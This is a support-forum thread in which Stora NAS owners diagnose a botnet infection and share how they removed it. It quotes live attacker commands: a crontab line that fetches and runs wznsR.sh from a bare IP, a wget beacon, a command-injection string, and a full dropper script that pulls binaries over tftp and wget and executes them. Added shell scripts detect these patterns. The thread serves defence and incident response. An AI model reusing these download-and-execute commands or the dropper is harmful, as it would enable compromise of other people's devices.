
Re: we are getting hacked ( netgear store )

Ennev
Tutor

we are getting hacked ( netgear store )

I've been noticing, and now I see other users have the same issue, of the Stora web interface becoming unresponsive some minutes after being powered up.

I know how to log into an SSH session on my Stora (won't describe it here),

but I've been noticing a task running that always changes its name slightly and uses a lot of CPU:

if I use the ps command:

ps aux | sort -nrk 3,3 | head -n 10

root     10193 44.1  1.1  37208  1436 ?        Ssl  15:45   8:46 ./.sox50

It's always called sox** and in the example is running at 44.1.

After a reboot it always comes back after some time.

So I went to check the crontab and I see this:

*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh

It means that every 15 min the Stora downloads and executes a file from that server, 188.92.74.189. A legit server is rarely just an IP address. I did a whois and this IP is registered in Latvia; I doubt that NETGEAR has facilities there.

So it basically downloads a shell script and executes it.

This script in itself downloads a binary file called nttpd-z and executes it!

It also installs a sox.sh and executes it too.

So I get that that's my big CPU eater.

How did it manage to install itself on the NAS? No idea!!

Seems that they know of a back door somehow, because the passwords on my machine are not easy to guess.

This is really concerning.

Message 1 of 18
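As an added illustration (not part of Ennev's post, and not any NETGEAR or OpenStora tool): a small POSIX shell checker that flags crontab entries of the kind quoted above, i.e. a downloader pointed at a bare IP address followed in the same entry by chmod or direct execution. The crontab it runs against is constructed for the example; only the */15 line is the one reported in the thread, the others are ordinary entries for contrast.

```shell
#!/bin/sh
# Added example (not from the thread): flag crontab entries that fetch something from a
# bare-IP URL and then run it, the persistence pattern quoted in the post above.

# Constructed sample crontab: ordinary entries plus the line reported in the thread.
sample_crontab() {
cat <<'EOF'
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
01 * * * * root run-parts /etc/cron.hourly
*/10 * * * * root find /var/lib/php/session -type f -name 'sess_*' -cmin +169 -print0 | xargs -r -0 rm
*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh
EOF
}

# Reads crontab text on stdin and prints every entry that (a) calls a downloader with a
# raw IPv4 address in the same command and (b) makes the result executable or runs it.
# Comments and blank lines are skipped; VAR=value lines never match (a), so they fall out.
flag_cron_downloaders() {
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*) continue ;;
        esac
        # (a) wget/curl/tftp followed, within the same command, by a dotted quad
        printf '%s\n' "$line" \
            | grep -Eq '(wget|curl|tftp)[^;|&]*([0-9]{1,3}\.){3}[0-9]{1,3}' || continue
        # (b) chmod +x / chmod 7xx, a ./relative execution, or sh/bash on a file
        printf '%s\n' "$line" \
            | grep -Eq 'chmod +(\+x|7[0-7][0-7])|(^|[;&| ])\./|(^|[;&| ])(sh|bash) ' || continue
        printf 'SUSPICIOUS: %s\n' "$line"
    done
    return 0
}

# Live use on the NAS (root shell): scan the system crontab and any cron.d fragments.
# /etc/crontab is where the thread found the entry; /etc/cron.d is an assumption.
scan_system_crontabs() {
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_cron_downloaders
}

# Demo on the constructed sample: prints the one SUSPICIOUS line.
sample_crontab | flag_cron_downloaders
```

A plain download (say, a backup pulled from an internal address with `wget ... -O`) is not flagged on its own; both conditions have to hold in one entry, which is what separates the pattern above from routine maintenance jobs such as the PHP session cleanup.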
Ennev
Tutor

Re: we are getting hacked ( netgear store )

From what I'm researching, it's indeed bad. This is code installed by a botnet called LuaBot, or something based on it.

Removing it is one thing, but preventing it from coming back? NETGEAR must have some kind of backdoor to our NAS that has been hacked, because it could be something obvious that gives root privilege. I don't think it's SSH with user root and password "netgear", but it could be as simple as that.

For the stats on my router, apart from eating a lot of CPU on the NAS itself, it's not transferring a lot of data. Might be dormant for something else like a DDoS attack etc.

Message 2 of 18
KipL
Initiate

Re: we are getting hacked ( netgear store )

I had the same issue on my MS2110 Stora. My Stora HDDs had been churning for several weeks... I thought it was doing some type of defragmentation of the drives or something. However, when I killed the nttpd process, based upon finding your post here, the HDDs went quiet. Not sure what the nttpd process is doing but I don't think it's anything "good". I initially got to your post by doing a netstat command which showed entries for the IP address 188.92.74.189... which is where all the "badness" seems to have come from. Turns out that there are shell scripts that pull down the following files using the wget command:

  • wznsR.sh
  • wzns.sh
  • soxsh.php
  • .soxP
  • .soxn0 (where n is some number)
  • .nttpd

These all seem to land in the /tmp sub-directory and get deleted as the payloads are delivered and after the .soxn0 and nttpd executables are started.

One thing extra that I will pass along... when I first started looking into the HDDs churning, I thought the Stora was hacked into from the outside and my files were being copied to who knows where. However, when I unplugged the network cable between it and my router, the churning continued. So, I figured none of my file data was moving across the wire up to the internet. Next thing I did was look at the log on my Netgear R8500 router (under Advanced > Administration). There I found many, many attempts to SSH into the Stora from IP addresses from across the internet (nothing on my local network). I had found another post while researching this that indicated the UPnP configuration that "makes access to the Stora faster" (whatever) is a big security hole. So, looking on my router under Advanced > Advanced Setup > UPnP, sure enough... there was a UPnP Portmap configuration entry for the IP address of my Stora. I disabled UPnP on my router, then after rebooting the router, have not since had the SSH attacks from the internet on my Stora. (Hoping this is the root cause of how this all started.)

I think, but cannot confirm, that an SSH session was probably established to my Stora from the internet through this UPnP back door and someone gained access... perhaps randomly guessing root's password systematically or using a similar process for gaining root access as you mentioned. I don't know for sure. But, I'm hoping this was how these Linux/LuaBot sox and nttpd executables got onto my Stora... as I have now closed off this "backdoor".

I did remove all remnants of this from my /tmp directory and from the crontab file, rebooted the Stora, and all seems well as of now.

Cheers!!

Message 3 of 18
gobojo
Initiate

Re: we are getting hacked ( netgear store )

Same problem. HDD chattering all the time. No access to the web interface after some minutes. I don't know how to log in to SSH, but I found a solution. Made a rule in my router saying that there should be no internet access to the Stora's IP address. Then I made a restart. That stopped the problems. Only thing is that I don't have the remote access. Netgear should provide a solution.
Message 4 of 18
brechbuehler
Aspirant

Re: we are getting hacked ( netgear store )

I found the same on a Seagate GoFlex Home, also a Stora. It's running Axentraserver, specifically

Linux version 2.6.22.18 (philippet@es5x86.axentra.com) (gcc version 4.3.2 (sdk3.2rc1-ct-ng-1.4.1) ) #14 Wed Oct 27 15:41:03 EDT 2010

In /etc/crontab, the last line was the same:

*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh

The web server in Latvia, http://188.92.74.189/, isn't currently up, so wget would just hang around for about an hour and presumably time out. (Thus 'ps' showed about 4 instances of wget at any time, started 15 minutes apart.)

I had noticed no activity on the Stora, just ran 'ps' by chance and found this.

Message 5 of 18
easen
Aspirant

Re: we are getting hacked ( netgear store )

I just want to say thank you, as this thread has really helped me out, as my Stora NAS has also been infected. It was only 2 months ago that I updated to the latest version from the stock OS; I recall the latest version is still a few years out of date. I only noticed the additional HDD noises yesterday and thought I would investigate... turns out it was "nttpd" that was causing the IO.

My 1st attempt at removing it caused my RAID to fail (was unable to shut down the NAS cleanly). It's currently resynced itself, so hopefully I haven't lost any data! I've now bought a Synology NAS to replace it; should have done that a long time ago!

Anyway, disabling the cron entry and disabling the network seems to have done the trick.

PS: if your RAID fails and you want to speed up the recovery process, here's a helpful guide: https://www.cyberciti.biz/tips/linux-raid-increase-resync-rebuild-speed.html

Message 6 of 18
pjg_pigeon
Guide

Re: we are getting hacked ( netgear store )

Thanks, I was suffering from the exact same problem.
Message 7 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Thanks for this post, this recently plagued my Stora...

Web interface would not load after a few mins and the HDD LEDs would blink every 5 secs or so.

If you all haven't seen this yet, this is a great resource:

https://sigri44.github.io/OpenStora/

One question though I do have, is what is this command doing over and over?

(root) CMD (find /var/lib/php/session -type f -name 'sess_*' -cmin +169 -print0 | xargs -r -0 rm)

The only way I saw this (and the wznsR.sh commands) was by enabling logging to a local folder (shown how in the OpenStora wiki).

I knew something was up when the LEDs would blink non-stop; finally, after commenting out the crontab job and disabling a few other features (access-patrol, UPnP and remote updates), the Stora seems to be back to normal.

Just curious what the session command is actually doing every 10 mins.

Any input helps and thanks much for this post.

Message 8 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Any idea what this hack was all about?

Was this hack trying to extract data from the Stora, and if so, was it successful?

If I start the Stora without the network cable, the green lights do not flicker and stay on all the time.

When I plug in the network cable, without restarting the Stora, the green lights start flickering.

Any feedback will be much appreciated.

Message 9 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Hi @Jest05

I would assume they want your data (i.e. documents with possible PW info in them) and access to your network and connected devices...

PuTTY into your Stora and review the crontab file and post what is in there.

Hope this helps

Message 10 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Hi d-lux,

I do not know the meaning of:

PuTTY into your Stora and review the crontab file and post what is in there.

I am sorry, I am not an advanced user and would appreciate it if you can expand on this issue.

Where do I find the crontab file?

Thank you.

Message 11 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Hi @Jest05

Please review this page for help on that (accessing your Stora via a PuTTY terminal):

https://sigri44.github.io/OpenStora/wiki/index_Easy_Root_Access.html

Then you need to access the crontab file using the vi command or chmod

(similar to this):

https://sigri44.github.io/OpenStora/wiki/index_Disabling_updates_and_external_access.html

I believe the crontab file is in /etc, but I can look again when I get home...

You have to be comfortable navigating your NAS via console to fix this virus; I am unsure of another way to see it or fix it (if you have it) without using the terminal.

Hope this helps

Message 12 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Hi d-lux,

I really appreciate the information you have provided. I am not a Linux user and this will be a bit difficult for me to carry out, although I may try these options later.

In view of the fact that Netgear will discontinue support for Stora after 1st April 2020, I have decided to purchase an alternative NAS, and for the time being I have disconnected my Stora from the network.

I only used to switch on STORA during backup, and usually I had STORA running for 24 hours every week rather than continuously on.

In view of the fact that the green lights were flashing, and also that after a few minutes it became impossible to log into STORA, do you know what these guys in Latvia were trying to do with their virus? Was it to get the STORA password in order to access the data?

I suppose setting the STORA not to have external access did not stop these guys.

Any feedback you (or others in this forum) can provide me with regarding the causes of this virus will be much appreciated.

Regards,

Message 13 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

PS... Does anyone know how many STORAs have been affected by this virus/hack?

Message 14 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

I am hacked too. 😞

And I clean the process and crontab every week, but I don't know how the backdoor works.

1/ I disabled access patrol and others:

-bash-3.2# chkconfig --list |grep :on
avahi-daemon 0:off 1:off 2:off 3:on 4:on 5:on 6:off
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
cups 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
lld2 0:off 1:off 2:on 3:on 4:on 5:on 6:off
locator 0:off 1:off 2:on 3:on 4:on 5:on 6:off
messagebus 0:off 1:off 2:on 3:on 4:on 5:on 6:off
minidlna.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
mynetworkd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ntpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-appserverd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-bootfinish 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-bootinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-spd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
pre-registration 0:off 1:on 2:off 3:off 4:off 5:off 6:off
reset 0:off 1:on 2:on 3:on 4:on 5:on 6:off
rslsync 0:off 1:off 2:on 3:on 4:on 5:on 6:off
seagate-lifecycle.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
smb 0:off 1:off 2:on 3:on 4:on 5:on 6:off
spindownd.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
syslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
transmission-daemon 0:on 1:on 2:off 3:off 4:off 5:off 6:on
vsftpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
xMySyncMount.php 0:off 1:off 2:on 3:on 4:on 5:on 6:off 

and disabled UPnP at the router? But it doesn't work.

Message 15 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

And now this botnet reports to a server by this process:

wget --post-data=df=&vr=vvvlet1 http://213.217.0.184/nap/fwnti-wlt.php

Message 16 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

I found some new activities of this botnet, and afterwards I found an interesting script:

/var/www/admin/sshtunnel.pl, and deleted all strings inside. Maybe it works; 5 days fine.

The last attack executes:

sh -c /usr/lib/spd/scripts/usb/usbremoveall /dev/b`wget -O /tmp/xxx http://103.20.235.213/Ax.html;chmod 777 /tmp/xxx;/tmp/xxx` manual

cat /tmp/xxx
#!/bin/sh
I=103.20.235.213;PW=80;PT=69;DT=600;
I1=103.20.235.211;P1=9560;
rm -f $0
a=dal;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dml;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dmb;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dx3;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dal;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dml;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dmb;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dx3;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi

 

Because for our root there is no way to protect the file? I deleted /tmp/xxx and created a folder xxx, and after this wget can't download the file.

 

 


Message 17 of 18
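As an added defender-side example (not cbiker's code, and not run against the real dropper): shell functions that pull block-list indicators out of a captured dropper script like the one pasted above, without executing any of it. They read the script as text and extract the dotted-quad addresses, the values of the P* port variables, the payload names assigned to $a, and which fetch mechanisms (tftp, wget) it relies on, which is what you need for egress firewall rules and IDS signatures. The excerpt they run against is constructed from the text quoted in the post (values as posted, two payload names kept, the repetitive lines dropped).

```shell
#!/bin/sh
# Added example (not from the thread): extract IOCs from a captured dropper script as text.
# Nothing in the sample is executed; it is only ever read through grep/sed.

# Excerpt constructed from the dropper quoted in the post above (quoted heredoc: no expansion).
sample_dropper() {
cat <<'EOF'
#!/bin/sh
I=103.20.235.213;PW=80;PT=69;DT=600;
I1=103.20.235.211;P1=9560;
rm -f $0
a=dal;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1;fi
a=dml;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1;fi
a=dal;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1;fi
EOF
}

# Every dotted quad in the script, deduplicated: the host it fetches from and the one
# the payload is told to talk to ($I1).
extract_ips() { grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u; }

# Numeric values of the P* variables (PW, PT, P1 ...), which the script passes as ports.
extract_ports() { grep -Eo '(^|;)P[A-Z0-9]*=[0-9]+' | sed 's/.*=//' | sort -un; }

# Payload file names assigned to $a before each fetch (one binary per architecture).
extract_payload_names() { grep -Eo '(^|;)a=[A-Za-z0-9_.-]+' | sed 's/.*=//' | sort -u; }

# Fetch mechanisms used, so both HTTP (on $PW) and TFTP (on $PT) egress get blocked.
extract_fetchers() { grep -Eo '(^|;)(tftp|wget|curl) ' | sed 's/^;//; s/ $//' | sort -u; }

# Summary in the form you would hand to whoever writes the firewall or IDS rules.
summarize() {
    script=$(cat)
    echo "ips:";      printf '%s\n' "$script" | extract_ips
    echo "ports:";    printf '%s\n' "$script" | extract_ports
    echo "payloads:"; printf '%s\n' "$script" | extract_payload_names
    echo "fetchers:"; printf '%s\n' "$script" | extract_fetchers
}

# Demo on the constructed excerpt.
sample_dropper | summarize
```

Note what the extracted list tells a defender that the process list does not: the dropper reaches out over TFTP (UDP, port $PT) as well as HTTP, so a router rule that only blocks TCP to the quoted addresses leaves one download path open, and the address the payload is pointed at ($I1) is not the address it was downloaded from.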
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

Now I don't know how the botnet starts, but activity is low; httpd works.

4 processes detected:

sh

sh

/bin/
./ts -g -i 10.0.0.1 -n 255.0.0.0 -R 1080:127.0.0.1:10800 -R 53:8.8.8.8:53

I added it to my killing script.


Message 18 of 18